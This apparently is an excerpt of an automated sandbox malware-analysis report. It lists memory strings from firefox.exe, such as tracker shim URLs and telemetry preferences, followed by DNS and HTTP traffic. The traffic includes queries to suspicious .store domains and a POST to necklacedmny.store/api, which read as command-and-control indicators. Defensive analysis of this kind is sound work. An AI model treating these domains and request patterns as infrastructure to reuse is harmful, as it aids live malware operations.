dons/addon-manager-startup;1https://smartblock.firefox.etp/play.svg*://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.jsprivacy.restrict3rdpartystorage.url_decorations equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/uriloader/handler-service;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/network/protocol;1?name=file@mozilla.org/dom/slow-script-debug;1DevTools telemetry entry point failed: devtools-commandkey-profiler-start-stop{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}devtools-commandkey-profiler-captureDevToolsStartup.jsm:handleDebuggerFlagresource://devtools/shared/security/socket.jsJSON Viewer's onSave failed in startPersistenceGot invalid request to save JSON dataFailed to listen. Listener already attached.devtools.performance.popup.feature-flagFailed to listen. Callback argument missing.Unable to start devtools server on Failed to execute WebChannel callback:and deploy previews URLs are allowed.devtools/client/framework/devtoolsdevtools.performance.recording.ui-base-urldevtools.debugger.remote-websocketdevtools-commandkey-javascript-tracing-toggleresource://devtools/server/devtools-server.jsNo callback set for this channel.WebChannel/this._originCheckCallbackdevtools/client/framework/devtools-browserdevtools.debugger.features.javascript-tracingbrowser and that URL. Falling back to releaseDistinctSystemPrincipalLoader@mozilla.org/network/protocol;1?name=default^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?Scheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%shandlerSvc fillHandlerInfo: don't know this typeget FIXUP_FLAGS_MAKE_ALTERNATE_URI@mozilla.org/uriloader/local-handler-app;1Can't invoke URIFixup in the content processbrowser.fixup.domainsuffixwhitelist.{33d75835-722f-42c0-89cc-44f328e56a86}http://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)extractScheme/fixupChangedProtocol<https://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}_injectDefaultProtocolHandlersIfNeededhttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sgecko.handlerService.defaultHandlersVersion@mozilla.org/uriloader/web-handler-app;1get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/JSONFile.sys.mjs^([a-z+.-]+:\/{0,3})*([^\/@]+@).+http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsisDownloadsImprovementsAlreadyMigratedresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/ExtHandlerService.sys.mjsMust have a source and a callback_finalizeInternal/this._finalizePromise<@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROS
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3181290798.000002592F054000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 9%, transparent)*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 9%, transparent)*://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etpamazondotcom%40search.mozilla.org:1.6resource://gre/modules/TelemetryStorage.sys.mjsTelemetrySession::onEnvironmentChangeTELEMETRY_ASSEMBLE_PAYLOAD_EXCEPTIONtoolkit.telemetry.ipcBatchTimeoutresource://search-extensions/bing/resource://gre/modules/ctypes.sys.mjsresource://gre/modules/UpdateUtils.sys.mjstoolkit.telemetry.overrideUpdateChannel_loadSessionData - session data is invalidtoolkit.telemetry.reportingpolicy.firstRuntoolkit.telemetry.send.overrideOfficialChecktoolkit.telemetry.untrustedModulesPing.frequencyinternal-telemetry-after-subsession-splitresource://builtin-themes/alpenglow/assemblePayloadWithMeasurements - reason: firefox-compact-dark%40mozilla.org:1.2firefox-compact-light@mozilla.orgtoolkit.telemetry.healthping.enabledtoolkit.telemetry.archive.enabledtoolkit.telemetry.minSubsessionLength@mozilla.org/windows-registry-key;1TELEMETRY_SESSIONDATA_FAILED_VALIDATIONtoolkit.telemetry.firstShutdownPing.enableddelayedInit/this._delayedInitTask<toolkit.telemetry.testing.disableFuzzingDelayresource://search-extensions/wikipedia/firefox-compact-light%40mozilla.org:1.2resource://search-extensions/ddg/wikipedia%40search.mozilla.org:1.3firefox-alpenglow%40mozilla.org:1.4toolkit.telemetry.shutdownPingSender.enabledtoolkit.telemetry.newProfilePing.enabledtoolkit.telemetry.eventping.minimumFrequencytoolkit.telemetry.updatePing.enabledtoolkit.telemetry.eventping.maximumFrequencydatareporting.policy.currentPolicyVersiondatareporting.policy.minimumPolicyVersiontoolkit.telemetry.newProfilePing.delaytoolkit.telemetry.previousBuildIDtoolkit.telemetry.testing.overridePreReleaseenableTelemetryRecording - canRecordBase:resource://gre/modules/ExtensionParent.sys.mjsc0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0resource://gre/modules/AsyncShutdown.sys.mjsdatareporting.healthreport.uploadEnableddatareporting.policy.dataSubmissionEnabledresource://gre/modules/ExtensionCommon.sys.mjsresource://gre/modules/E10SUtils.sys.mjsresource://gre/modules/ExtensionDNR.sys.mjsresource://gre/modules/ExtensionDNRStore.sys.mjsresource://gre/modules/AddonManager.sys.mjs8# equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedhttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/(currentDate|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' | preferenceValue == truehttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D45503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D45503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D45503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/intervention_helpers.js[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/intervention_helpers.js[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/intervention_helpers.js[{incognito:null, tabId:null, types:["main_frame"], urls:["*://login.microsoftonline.com/*", "*://login.microsoftonline.us/*"], windowId:null}, ["blocking"]]moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 0000001A.00000002.3176703968.000002592395D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
